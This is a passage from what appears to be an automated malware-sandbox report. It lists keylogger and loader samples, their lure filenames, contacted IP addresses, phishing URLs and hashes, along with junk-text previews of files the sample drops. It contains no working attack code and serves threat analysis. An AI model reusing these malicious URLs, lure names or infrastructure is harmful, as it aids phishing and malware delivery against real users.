                                                          rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 158.101.44.242
                                                          invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.247.73
                                                          New PO 127429.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 193.122.6.168
                                                          BugSplat64.dll.dllGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 193.122.6.168
                                                          60069-PO-13228.pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 193.122.130.0
                                                          RFQ-INQUIRY#46883-A24.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 193.122.6.168
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          UTMEMUSINV76280.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 132.226.247.73
                                                          rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 132.226.247.73
                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 132.226.247.73
                                                          invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.247.73
                                                          Bank Slip pdf (2).exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 132.226.247.73
                                                          Quotation.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.247.73
                                                          Request For Quote.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 132.226.247.73
                                                          RECEIPT ATTACHMENT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 132.226.247.73
                                                          Finerede.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 132.226.8.169
                                                          Bibliofils.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 132.226.247.73
                                                          CLOUDFLARENETUSdocument.xlsGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.96.1
                                                          https://studiotokyo.com.br/box3/fkfjgjghhbmdjjjf/%E3%80%82cmljaGFyZC5jb29wZXJAd2lsc29uc2Fkdmlzb3J5LmNvbS5hdQ==%25E3%2580%2582Get hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          b4.elfGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          b2.elfGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          http://docs.google.com/presentation/d/e/2PACX-1vQcrjnf7gURVzMBWWOuUbQjiGVDYKRTaJYBkU2B-88HeCHz8FldVlIe7zd9DgUfzBPVRT8Bm5GM_Nuh/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          nhiTmqJhgC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • 104.21.95.93
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          https://www.sendthisfile.com/CsBiLCoTZqw4Kp0mvrvr4ngfGet hashmaliciousUnknownBrowse
                                                          • 104.21.27.152
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          54328bd36c14bd82ddaa0c04b25ed9ad[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.64.1
                                                          INV76280.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 104.21.64.1
                                                          rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 104.21.64.1
                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 104.21.64.1
                                                          rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 104.21.64.1
                                                          invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.64.1
                                                          New PO 127429.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.64.1
                                                          BugSplat64.dll.dllGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 104.21.64.1
                                                          60069-PO-13228.pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 104.21.64.1
                                                          proforma fatura No. 90273641836.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 104.21.64.1
                                                          37f463bf4616ecd445d4a1937da06e19BANK SLIP_TT COPY_003456864-2-18-2024_pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          Quote-553780956787535101-UAE-24_pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          23749-28764875432.5.exeGet hashmaliciousUnknownBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          build.exeGet hashmaliciousVidarBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          Udeladelsers21.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          SecuriteInfo.com.Win64.Evo-gen.21573.534.exeGet hashmaliciousUnknownBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          SecuriteInfo.com.Win64.Evo-gen.22439.26634.exeGet hashmaliciousUnknownBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          SecuriteInfo.com.Win64.Evo-gen.21573.534.exeGet hashmaliciousUnknownBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          SecuriteInfo.com.Win64.Evo-gen.481.22395.exeGet hashmaliciousUnknownBrowse
                                                          • 142.250.185.193
                                                          • 172.217.16.206
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Temp\nszB838.tmp\System.dllUdeladelsers21.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            rFactura1-000122.exeGet hashmaliciousGuLoaderBrowse
                                                              https://oss.niimbot.com/print/pc/package/3.12.11/niimbot-print_win_3.12.11_x64.exeGet hashmaliciousUnknownBrowse
                                                                rSlutelementer.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  Zoom Client Setup.exeGet hashmaliciousUnknownBrowse
                                                                    Zoom Client Setup.exeGet hashmaliciousUnknownBrowse
                                                                      NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                        NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                          xt1kRECQpq.exeGet hashmaliciousUnknownBrowse
                                                                            3UIPJJtHDo.exeGet hashmaliciousUnknownBrowse
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                              Category:modified
                                                                              Size (bytes):846
                                                                              Entropy (8bit):3.45252604806538
                                                                              Encrypted:false
                                                                              SSDEEP:12:8wl0c0a/ledp8wXuQUlbqOl11RsbdpYmHbq+14kXWmvRdRc0zJCN85v4t2YZ/elr:8QudO/9lTYd9l4MJw224qy
                                                                              MD5:BA27DF34223B9D62B86A37DDD99B9B1B
                                                                              SHA1:71A2670AA9F59922E1838214359565D0431C1FBF
                                                                              SHA-256:3F448C804FEFB0CF3B1BC38A429A4316EF3D1A04388B3190D31FDF17DC337D17
                                                                              SHA-512:5852137128F8A8D203EF63CA96D50745FD1DB8E1DE351351611B3FE80357D01E23CAEB9EE32405C2C8016BC4EB49B975CE3D1045B70F4C64CF992571F35A99BB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........prgedes.paa.H............................................p.r.g.e.d.e.s...p.a.a.......5.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.p.r.g.e.d.e.s...p.a.a.,.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.s.p.i.n.s.t.e.r.i.s.h.l.y.\.F.i.s.k.e.r.e.t.t.e.n.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):12288
                                                                              Entropy (8bit):5.719859767584478
                                                                              Encrypted:false
                                                                              SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                              MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                              SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                              SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                              SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Joe Sandbox View:
                                                                              • Filename: Udeladelsers21.exe, Detection: malicious, Browse
                                                                              • Filename: rFactura1-000122.exe, Detection: malicious, Browse
                                                                              • Filename: , Detection: malicious, Browse
                                                                              • Filename: rSlutelementer.exe, Detection: malicious, Browse
                                                                              • Filename: Zoom Client Setup.exe, Detection: malicious, Browse
                                                                              • Filename: Zoom Client Setup.exe, Detection: malicious, Browse
                                                                              • Filename: NexoPack Setup 1.0.0.exe, Detection: malicious, Browse
                                                                              • Filename: NexoPack Setup 1.0.0.exe, Detection: malicious, Browse
                                                                              • Filename: xt1kRECQpq.exe, Detection: malicious, Browse
                                                                              • Filename: 3UIPJJtHDo.exe, Detection: malicious, Browse
                                                                              Reputation:high, very likely benign file
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):846
                                                                              Entropy (8bit):3.45252604806538
                                                                              Encrypted:false
                                                                              SSDEEP:12:8wl0c0a/ledp8wXuQUlbqOl11RsbdpYmHbq+14kXWmvRdRc0zJCN85v4t2YZ/elr:8QudO/9lTYd9l4MJw224qy
                                                                              MD5:BA27DF34223B9D62B86A37DDD99B9B1B
                                                                              SHA1:71A2670AA9F59922E1838214359565D0431C1FBF
                                                                              SHA-256:3F448C804FEFB0CF3B1BC38A429A4316EF3D1A04388B3190D31FDF17DC337D17
                                                                              SHA-512:5852137128F8A8D203EF63CA96D50745FD1DB8E1DE351351611B3FE80357D01E23CAEB9EE32405C2C8016BC4EB49B975CE3D1045B70F4C64CF992571F35A99BB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........prgedes.paa.H............................................p.r.g.e.d.e.s...p.a.a.......5.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.p.r.g.e.d.e.s...p.a.a.,.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.s.p.i.n.s.t.e.r.i.s.h.l.y.\.F.i.s.k.e.r.e.t.t.e.n.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:Generic INItialization configuration [unreachableness cirkelbuer]
                                                                              Category:dropped
                                                                              Size (bytes):385
                                                                              Entropy (8bit):4.832402033784482
                                                                              Encrypted:false
                                                                              SSDEEP:6:TgHzz2qOXw2WiNBEzeEbEHJMA20Lm/HklkC70jeQQuRhClLZMJyNUivycFAe1:KGJYiNyXgHJMAt6HkyC70jkRT71
                                                                              MD5:90EC9FEAAB66462033FBB70FB9A3EE4B
                                                                              SHA1:7AEF435EFC9C6007010315D6A7278A04E5A52429
                                                                              SHA-256:E2C21AFE2CCD6E3D219780F268500BB8337D8B891E8595EC7C49AC35BAAC2057
                                                                              SHA-512:2CF848417755B906827EB26E42F84B8A454EA409855F3705D74E66F0F4340B8019D914E6616D302A69363A5F834A6E1CCB9A1F2B7887FA5A42BD11CAE317BEB4
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:[NYTESTAMENTLIGES BORTLEDENDES]..servatius sjungede foretog gesticulates vandomraades stramtandet skyndte metataxic,afbalancerede harmendes biindtgters datids torsions eurhythmics masseuses..[unreachableness cirkelbuer]..Steerers petiteness deltabels fils,tvangsmiddelet quadrilaminar reolpljningens smughandler ellevilde..[funktionsgennemgangens paragonite]..[METRIZED PATRULJERING]..
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 785x561, components 3
                                                                              Category:dropped
                                                                              Size (bytes):28874
                                                                              Entropy (8bit):7.844370082286915
                                                                              Encrypted:false
                                                                              SSDEEP:768:JPcUFwwqj73AuqAnmlcjknNblmP1CvYUI3dtz1VSA:JPcUsjHqOwxDYiA
                                                                              MD5:C9ABF950B5EA7C4E30DD9F58FC96E8D2
                                                                              SHA1:783B728F9C93A86A9524AF93F9DF2EC851A38A69
                                                                              SHA-256:7B1F375157924D100B36C83547FD9A070C5C2F99AA2821AF7372D73DD34A264B
                                                                              SHA-512:C40DAFA22A0D2AEAB1757D1EF4A4D47A5A3098552C98AB1CA36A4C8D4EB6526ACD632737ACE30C04DD56C37F967B2477991DB1A461BAC329A26B6A050EA6A7BE
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......1...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...L....4Rf...J(..RQ@.-%.........Rf..Z?.J(.h...AE%.h......E%..-..P...%...)..4..)3K..(.........4Rf.4.....H.f..K.`:.IK@.KM...)i)i.....@.- .P1E8R.p..(..L...&....O.u..p*.R..(.DZ..j.}.-.Q@.E%-..QE..QE..f.(.sE%...RQ@.E%-..QE....P.KIE.-.........Z(.....Q@.KM.......ZZJ(.h..4..Rf...)(.C.)(...4.P1{.J(...J.Z)(..-.......4f...L.@.Fi3Fh.sKM...I.L..vh.....3M....3M...;4SsK..Z3I.(..4...
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):450534
                                                                              Entropy (8bit):2.6473802752967566
                                                                              Encrypted:false
                                                                              SSDEEP:3072:d3x7TBmJ/bOa0qNwkQOlSzOrRth4+49IBW276D:dhnghuq+kLSOrRth4XCBWY6D
                                                                              MD5:E846A0B20301808D60676739AC9B5EB1
                                                                              SHA1:E930132F14B65F087EF4FD0F82AD02A63B546244
                                                                              SHA-256:FD753F0E8394081E9DC335352A9A1681D6E542AF7E24E891C5A37E2DF65B3F10
                                                                              SHA-512:7D1E14D4CEC4ED12F22C3909EDAC6C802D421BF00F045BF61DBE10B9357708B4BAF3F12CEB0D0709832134DC9E1FC41F32D922B254E62A65AA731B09D591B36A
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:0000003C3C3C00000082000202020000F20000DBDB009F00C90000EFEFEFEFEFEFEF0016000000E7E7004D00C7C7000000840092920000CECE0081818100A5A5000000ADADADADADAD00BE00BB00005E5E00000000474700005C5C00007700005A5A000023000000C2C2C20000008D00A6000000004400C1003E3E3E0055000000007100210000002B000000510000007070700000C600003F0000740000D1D10000BFBF00004D4D4D000050000054000000000000000B0008000085000000A6A6001700000000170000AAAAAAAAAA008200EA0000001600FEFE00600000000000D2D200740000002323230000AB00AFAFAFAF00CB00460002000000010000004A0000001600000000040404001212120000B5B5B5B500000000F900DF0000450000B3B300A20000000000FF00530000F9003200CC0008000000000031313100A0005B000000000000F3F3000000DA0099004444000018181818180046000095000000180000000000000D0D0D0D0000000000D10000EA0000ADADAD000000006200FA00A7000000D50091000000000000000000CDCDCDCDCDCD0000006E00C1C10000670000E2007F00B5B5B50000F60000AB0000000005006060606000A40000373700000000EDED0000DC007D7D7D7D7D000083000000130000E9E9E9000000B1B1B1B100000010003E0097970000009B0000
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):215804
                                                                              Entropy (8bit):7.513742176745442
                                                                              Encrypted:false
                                                                              SSDEEP:3072:auYg7NtmmfwGUNKQMibuuvBtskYCWBYZiLuWhnsF+fAFlPmnhHvF3nVPXoT7XxCl:amNFUNC4LBBYCWBtCohPFnx+hyYto1AW
                                                                              MD5:C305740F9F095BD3F9D7DFFA1068399E
                                                                              SHA1:6976A759EE936BDEE1DF7CAA370494A1B3701AE4
                                                                              SHA-256:4D6A7623602268D5A5BC24E72B2E92658D1196C85A3D15C8C398D7AEC8B2F9E0
                                                                              SHA-512:DE84527E96BC3021C36C7CC81BCC2BF533EC6C36F308CD845BBA5484F8B6C8B7FD42617F411DFB9DE1BA98AFA855FC3B9E1B3639F236C9B7911A93FEEAF31892
                                                                              Malicious:false
                                                                              Preview:....s.l........c........................XXXX......z.....m..........777...............................ZZZ........$.........y................T.9.p.................h..v......................R.).$$.r............X.........R.77........V....Q...JJ.*.......1................dddd...ddd......!!!!..p.44444.......W...a........A......{......aaaaaa....t.......[[[.. .............hhhh....8.????.............kkk....}.........M.f..I...|....."..............*............cccc..I...K.......[.7.....n.))....&.....B............b......................^.!..............f.........T...................\.......-.....xxx.......y.....d...ppp.......h..j.........................vv......ZZZZ....%....xx...........55..................g...............................????.......h.....V.................D.cc.6.....A.****......!!!..'....g...............hh.........=...................R.88....n........TTT.....ppp..........5...........FF.........................................*............nnn.....3.....DD.......(.AAAA.22....[[[[[.
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):491
                                                                              Entropy (8bit):4.31953270914656
                                                                              Encrypted:false
                                                                              SSDEEP:12:7KiEoPLTxneWRDBeFaSWTVQK/mD5VWlHAX/bIogUXv:+xojTxneydeF0QKF9Wfg6
                                                                              MD5:663E26E192D34C89A21482F86A0CC079
                                                                              SHA1:D50C89DDF76D97B7FFF7AFBB20FE698B820F35BE
                                                                              SHA-256:79AB4370CA578D5FA793BFE1A3041D70B95855D3056594FA41EDC00ECF416A20
                                                                              SHA-512:B9A84B48F8A8F733F10A88F285169ECA7416E6FE1A2B51B73A4A4228C7A8781292DCBDE1FF748ECD1E7FF14B743F3E0BF455EE3C1BD0BF2454B0E33B39A30FA3
                                                                              Malicious:false
                                                                              Preview:scholar tined skoleskemaet underinstrument freezed triangels luncheonettes hetzers eldest.Ietf bodelsen pressed perjury..;curvative spejldrens spyd,ballede mickeis rsk illustrationens..luteotropic deprecieringens adigranth vellysten immatrikulationers unawful blackberries.Fremsigelsernes liverance tumlernes skaget yffrit udstykkeren prat......efterbrnderne soger unnominalistic plastikkirurgisk recalls diploplaculate.Decarbonises ceaselessly roses rendingen jernbanearbejder munkeordens..
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):652
                                                                              Entropy (8bit):4.355240967905803
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQK0AeDcGABWyOVm1kjppAiYFCR/TD6zQAFqrX47tP8wokbb1XF1LbkeW0r3q:DQK0AeDKczjDInzQzrX47tP3ZIKr3q
                                                                              MD5:790EBF2AC0CA4ADCDB58E45D0A450DBC
                                                                              SHA1:D18F698C2AA650D78AD5167E3B2B9953F54D3F8A
                                                                              SHA-256:C49F3F671B7CBF550040EA2DC10D462A46D87C7D62CA0F85C6CDFE86A42CECD2
                                                                              SHA-512:1F3D6EE159D0EE604D22A6565228F41C58FADCF141B8A69A277D70B8D74A3306205B3FC56C1F4D93873056BF29C68053305B55EEA3B878A0C967739D224A445B
                                                                              Malicious:false
                                                                              Preview:[careys frolick]..Unenumerative transcondyloid stiverne stratton unaxled tunicles deeping mertensia gaelicism..bovid cyclometers enclitics smaastenene wienerlgs fartforbrydere dehydreringers tilvarsels skolebord forflygtigelsers ledsagemusik.Forlyset faktoranalysens readjuster..tilgroningernes broderorganisationernes revictualed,affaldsproducenters papilionidae oldsag bikes adolph klokkernes flderandene undviger firefoot..Benhindebetndelsens cornering stortingsmedlemmet salgssum kompliment maskinarkitektur redcoll..;fireplough lejevrdier noedvendig boksestvne amputerendes justest.Argusblikkes radiales dejectedly teleobjektiv ful topnglesttene..
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):29380
                                                                              Entropy (8bit):1.2646489004189274
                                                                              Encrypted:false
                                                                              SSDEEP:192:vp3MOAy7WiXB2O1NUcFWb38pStMMI81jeUWBmSF//LzzIxj13gjwKWuQ6SSph7NC:x3vArO7WwNM/JUZe3gjw36z7A
                                                                              MD5:766D9EF7530D23758F482B0AB2B54788
                                                                              SHA1:C430E21B1463ECEB32D05C6F0909D9821C27A3E7
                                                                              SHA-256:7BA4160056FB1B321E5859A9AA1F9C277B9C798B968C34E735F5222710E7ED09
                                                                              SHA-512:5BC154B564AF204C25D2E7651E3C4C9F9263C3E6A88F149DDBE9892BAF0B26079E171AEBAC4DD334EE8192EC4F2C5D510536A2287AD1EEA5BD357AAAFABAD68F
                                                                              Malicious:false
                                                                              Preview:9999999999999999999999999.99.999999999999999999999..99_9999.99999999999999W999999999.99999999999999.99..1999999.99999999.99.999999.9999999999999.99999999999999999..9999999999999999999999999992.99191r99999999999999999999999999999999.99999999999999C9999999.999999999999999999999o99999999999.99999999999.999999999999..9999999999999999999999@999Q999999.99999999999.c999999o.9.9999.9999999999999999999999999999.9.9999999999'99999.999999999999999399999.9999999999999o999.9999999999999999999999999699999999L999999999999999...9!99999999999999o99999999999.99999999999.999999`99999999999999999%99999999999999999999999999999.999D99999999999999999999S9999999999999.9999999999999999B999.999999999999999999999999999.999.99999W999..99999.99999999.999!9999999999.9.99999999999ZE99999999999999999999q99.9999.99999..999999999999999999999999999999999999>9999999999l99999999999.99.999999999.999999999999999F9999.99999999999999.9999999999999999999999999.9999999.99999999..99999999999.99999(999999.999999999999{9999999j999
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:Generic INItialization configuration [ELEVCENTRERET RKKEHUSETS]
                                                                              Category:dropped
                                                                              Size (bytes):602
                                                                              Entropy (8bit):4.605036996213703
                                                                              Encrypted:false
                                                                              SSDEEP:12:VOnCFZCC0zHqKKMiM5tLBcwhRlZGoMTisWPulSW5VKZRU4wPa:UGQCsqKtiEvlEBTi1W5gZRB
                                                                              MD5:AC5918C28B077C9134D607DD4DA5C7D8
                                                                              SHA1:0B6E4CD64998D4A6BDCBD6698F1388BB0B4F204D
                                                                              SHA-256:7A0296F17E8BDED15E306321AF16A537DFE424EA806BDA138402C11453C27E1D
                                                                              SHA-512:0B83B999A6EE4FD22604DF2ED2610403ABEAA24AA0926DB61C91F63B9477A0AA63DA1AC8B6C2DE348F523E7ED4C414CD28A30B75E8B6FADED2C2431D5F6A6F5E
                                                                              Malicious:false
                                                                              Preview:[regrettable nominates]..[ELEVCENTRERET RKKEHUSETS]..glossata skringsdagen skolepligtige eklektikernes empodium mukade,administrations atypical shammes..Disciplineringer underwrapping vovvov fyldplads aalborgsk samplingernes tjenesterne,pjalters kortfilms knkfrit optrnet affrightedly proliferation..Aeronomics scutcher brnehaveseminarium physiopathology dissentieringen,subpellucidity kvrnenes konverteringsforlbet nulvksten vacates synkroniske mokkers..;ddboldsituation pleuracanthini lyc escalop forveksleligt.Transportrers dormitoriernes afvigelsens decidual familiepolitikkens bentjets rytternes..
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):497
                                                                              Entropy (8bit):4.53243935171649
                                                                              Encrypted:false
                                                                              SSDEEP:12:0IFT8Q2uF5oBYyQgRxc6h9JOTTu8MSgMgUWYM16Ew51NLaH:X8VuYYyxrhrViBDy/9H
                                                                              MD5:349C3014AD27290CECAF439303816708
                                                                              SHA1:33C07D049A06EDA444A3AB12E4E935D61618ADC8
                                                                              SHA-256:7AEA294FBDC4CFA3972C4BF45A2C787F38174B5A0E8A3C2AB45ACB0FC5B5D120
                                                                              SHA-512:801B190430E8FBED64D7EE2E1BCAA2A35651E5C261D79726E93668D7F13DEA58D8CCD34EDBCA3FD4340B219AB1FA75CB2F58ADAE2EF79741C8886462A6A16FCE
                                                                              Malicious:false
                                                                              Preview:brasende fuges rescale brahmin trskringer supertankerens.Circumstantiable undervisningstrinnenes kommutative accessing..Annonceres vaporlike kartotekisere sukkertoppene ndringskommandoens saxifragaceous,uncraven requiem artsflle parenthesis..Draffier elves konsekvensrettelsers vases repadded unsers nettoomsaetning,caltraps slutvaerdien melicerous sesma..[elastikbindet skinned]..Befragteren marjanne gnosticises,superficiality semiticize arco edsaflggelse bilanders..[VITROPHYRIC REDISCOVERER]..
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):499466
                                                                              Entropy (8bit):1.2537138658824154
                                                                              Encrypted:false
                                                                              SSDEEP:1536:n9B+wZ0kdeJjeICC3gnX++yF9zMVwwC6mfPWc:n950dCqaXFyPzM1mfB
                                                                              MD5:A751D549670670F890F5A08CC4F5A4D6
                                                                              SHA1:C44D434264F7DAE94C0D5A7FB58053D81B99391D
                                                                              SHA-256:D05E57BC53965EA455C243B24BD34A5549ED8F08698C834A411435F0EB9F893D
                                                                              SHA-512:03FDFE35FC7D8DD0BF02E7E78C7D69B989A6A495BD4ECBDD34C1012AE82B7ABFDBE8FC30B82705BF54BDBD0F2493F7A04F78F9FA15809A8461AD556B8A584AA8
                                                                              Malicious:false
                                                                              Preview:....V..b.........U\.....k..........................................................................J..(............#...-.................................................................)....zO..7...............................................................T...............z..................u.........................r....................................l.........|...........................................'..j...#.................................7...................................................................Y............T....K........................!................................................................................,.............................................................)........W...........................................................................................................$...............C..W.........................S.............................k..............................................*.....................:..........
                                                                              Process:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):271621
                                                                              Entropy (8bit):1.2540543167421097
                                                                              Encrypted:false
                                                                              SSDEEP:768:KtofaHIEDu5ffzIabBiHt/tAr4ajzjk8NG4GwGuV0VXHfR:1faDwfzIaAYDjk8gXfR
                                                                              MD5:CCE99D8B4C78640993AA75D7C428D061
                                                                              SHA1:6C4F21368687D9A2C8423032BCC8E0ED3227DA07
                                                                              SHA-256:33D5EDAE3829EF41E644CD76D9BC5F8386420513BD254CA7AB4A88C5C615810C
